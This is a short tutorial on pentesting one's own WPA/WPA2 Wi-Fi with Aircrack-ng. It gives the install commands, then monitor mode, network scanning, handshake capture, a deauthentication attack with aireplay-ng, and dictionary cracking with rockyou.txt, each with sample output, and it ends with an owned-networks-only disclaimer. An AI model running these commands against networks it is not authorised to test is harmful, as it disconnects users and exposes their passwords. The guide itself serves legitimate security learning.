Wi-Fi Pentest Using Aircrack-ng
Target: Your own WPA/WPA2-protected Wi-Fi
Tools: Aircrack-ng suite, Monitor-mode capable Wi-Fi adapter
OS: Kali Linux, Arch, or any Linux distro
Download below wordlist
rockyou.txt
Step 0: Install Aircrack-ng
Arch Linux
sudo pacman -S aircrack-ng # ARCH LINUX
Kali Linux or Debian
sudo apt install aircrack-ng # Kali aur debian based
Step 1: Put Your Wi-Fi Card in Monitor Mode
sudo airmon-ng start wlan0
Expected Output:
Interface Chipset Driver
wlan0 Realtek rtl8812au - [monitored]
monitor mode enabled on wlan0mon
Your monitor-mode interface is now wlan0mon.
Step 2: Scan for Wi-Fi Networks
sudo airodump-ng wlan0mon
Expected Output :
BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -40 100 20 6 54e WPA2 CCMP PSK myHomeWiFi
Note down:
BSSID:AA:BB:CC:DD:EE:FFChannel:6ESSID:myHomeWiFi
Press Ctrl + C once noted.
Step 3: Target the Network + Capture Handshake
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Expected Output:
CH 6 ][ Elapsed: 1 min ][ WPA handshake: AA:BB:CC:DD:EE:FF
BSSID STATION PWR Rate Lost Frames Probe
AA:BB:CC:DD:EE:FF 11:22:33:44:55:66 -60 1e-1e 10 50 iPhone
Let this run and capture the WPA handshake. You’ll see [ WPA handshake: ... ] appear top-right once captured.
Step 4: Trigger a Deauthentication Attack (Force Handshake)
Open a new terminal:
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
Expected Output:
10 deauthentication frames sent to broadcast
A connected device will drop + reconnect, generating the handshake.
Step 5: Crack the Handshake with a Wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Expected Output:
Reading capture-01.cap, 12345 packets read
Opening rockyou.txt... 14344392 passwords
KEY FOUND! [ password123 ]
Master Key : 11 22 33 ...
If it finds the password → 🎉 cracked.
If not, try a better or more relevant wordlist.
⚠️ DISCLAIMER
This is for educational purposes only and should only be used on networks you own or have permission to test.